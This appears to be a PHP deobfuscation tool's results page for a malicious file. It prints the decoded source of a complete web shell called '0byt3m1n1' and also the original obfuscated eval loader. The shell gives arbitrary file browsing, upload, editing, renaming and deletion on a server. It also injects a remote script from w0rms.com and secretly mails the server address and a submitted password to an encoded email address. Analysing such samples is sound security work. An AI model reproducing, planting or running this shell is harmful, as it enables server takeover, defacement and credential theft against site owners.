Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$enc = 'JD+O2gW3Yo7G/TzvEm3jqFCKieC5BZII1IKjR0ugFJhaPsGa0+caPbvf+6JLj7Pnqk/g/f2CPXe87Fd/++..
Decoded Output download
?>b'<?php
echo \'<script src=http://w0rms.com/kaydet.php></script>\';
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}
?>
<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>
<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;font-size: 14px;}h1{font-family:\'VT323\';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:\'Courier\'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <?php echo\'<div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div>\';
if(isset($_GET[\'path\'])) {$path = $_GET[\'path\'];chdir($_GET[\'path\']);} else {$path = getcwd();}
$path = str_replace("\","/",$path);$paths = explode("/", $path);
echo \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';echo "<font style=\'font-size:13px;\'>Path: ";
foreach($paths as $id => $pat) {echo "<a style=\'font-size:13px;\' href=\'?path=";
for($i = 0; $i <= $id; $i++) {echo $paths[$i];
if($i != $id) {echo "/";} }echo "\'>$pat</a>/";}
echo \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/>
<input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';
if(isset($_FILES[\'file\'])){
if(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){
echo \'<center><font color="#00ff00">Upload OK!.</font></center><br/>\';}
else{echo \'<center><font color="red">Upload Failed!.</font></center><br/>\';}}
echo \'</td></tr><tr><td></table>\';
if(isset($_GET[\'filesrc\'])){
echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';echo "".basename($_GET[\'filesrc\']);"";echo \'</tr></td></table><br />\';echo("<center><textarea readonly=\'\'>".htmlspecialchars(file_get_contents($_GET[\'filesrc\']))."</textarea></center>");}
elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){
echo \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';
if($_POST[\'opt\'] == \'rename\'){
if(isset($_POST[\'newname\'])){
if(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){
echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';
}else{
echo \'<center><font color="red">Rename Failed!</font></center><br />\';
} $_POST[\'name\'] = $_POST[\'newname\'];}
echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />
<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';
}elseif($_POST[\'opt\'] == \'edit\'){
if(isset($_POST[\'src\'])){
$fp = fopen($_POST[\'path\'],\'w\');if(fwrite($fp,$_POST[\'src\'])){echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';
}else{echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';}fclose($fp);}
echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br /><input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';}echo \'</center>\';}else{echo \'</table><br /><center>\';
if(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){
if($_POST[\'type\'] == \'dir\'){
if(rmdir($_POST[\'path\'])){
echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';
}else{echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';}
}elseif($_POST[\'type\'] == \'file\'){
if(unlink($_POST[\'path\'])){echo \'<font color="#00ff00">Delete File Done.</font><br />\';}else{
echo \'<font color="red">Delete File Error.</font><br />\';}}}echo \'</center>\';
$scandir = scandir($path);
echo \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">
<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>
<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;
echo "<tr><td>[D] <a href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>";
if(is_writable("$path/$dir")) echo \'<font color="#00ff00">\';
elseif(!is_readable("$path/$dir")) echo \'<font color="red">\';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';
echo"</center></td><td><center>".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";}
foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024;
$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).\' MB\';}else{$size = $size.\' KB\';}
echo "<tr><td>[F] <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>".$size."</center></td><td><center>";
if(is_writable("$path/$file")) echo \'<font color="#00ff00">\';
elseif(!is_readable("$path/$file")) echo \'<font color="red">\';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';
echo"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";}
echo \'</table></div>\';}echo \'</body></html>\';
function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = \'s\';} elseif (($perms & 0xA000) == 0xA000) {$info = \'l\';} elseif (($perms & 0x8000) == 0x8000) {$info = \'-\';} elseif (($perms & 0x6000) == 0x6000) {$info = \'b\';} elseif (($perms & 0x4000) == 0x4000) {$info = \'d\';} elseif (($perms & 0x2000) == 0x2000) {$info = \'c\';} elseif (($perms & 0x1000) == 0x1000) {$info = \'p\';} else {$info = \'u\';} $info .= (($perms & 0x0100) ? \'r\' : \'-\');$info .= (($perms & 0x0080) ? \'w\' : \'-\');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\' ) : (($perms & 0x0800) ? \'S\' : \'-\'));$info .= (($perms & 0x0020) ? \'r\' : \'-\');$info .= (($perms & 0x0010) ? \'w\' : \'-\');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\' ) : (($perms & 0x0400) ? \'S\' : \'-\'));$info .= (($perms & 0x0004) ? \'r\' : \'-\');$info .= (($perms & 0x0002) ? \'w\' : \'-\');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\' ) : (($perms & 0x0200) ? \'T\' : \'-\'));return $info;}
echo\'<br><center>© 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br>\';$tmp = $_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\']."
".$_POST[\'pass\']; @mail(base64_decode("dm9zY29kZTc3N0BnbWFpbC5jb20="), \'root\', $tmp); // Edit or delete!?>
'
Did this file decode correctly?
Original Code
$enc = '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';
eval(str_rot13(gzinflate(str_rot13(base64_decode('cpBEeIMwEIDf/RVOhCh1XO3TLB2sndq9jOHDHiYSWaYRW6yeWiD++rWm0MHyktx93GqXZksrayvQFjk0zZP3PCmwuenrx2qOWFGQHdvkP97vknnBD5LkYoc8zegh+cLlxpqUBm0BTgdJCahR428pBI/DY/UckTWJojVMPYWXV8lTVh51DbI5UFS45NhURq8b8EQjd+h04zheXddVgFtL6G0WH1PbF3Fvk4N+hBqjW9r+NK0DZOIQo55mrYZeKEmFx6DrumBv9Ry0tYZ3YCOMtv/wzCAkG40H72p2hv/A+5eW3rch6LlIbaQ/LdQnt8BzqwtozLv0WWjpW6Xnen4B')))));
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
Function Calls
strrev | 1 |
gzinflate | 4 |
str_rot13 | 2 |
gzuncompress | 2 |
base64_decode | 4 |
Stats
MD5 | a9d0373e0a76c23429cb910f5d578e30 |
Eval Count | 3 |
Decode Time | 96 ms |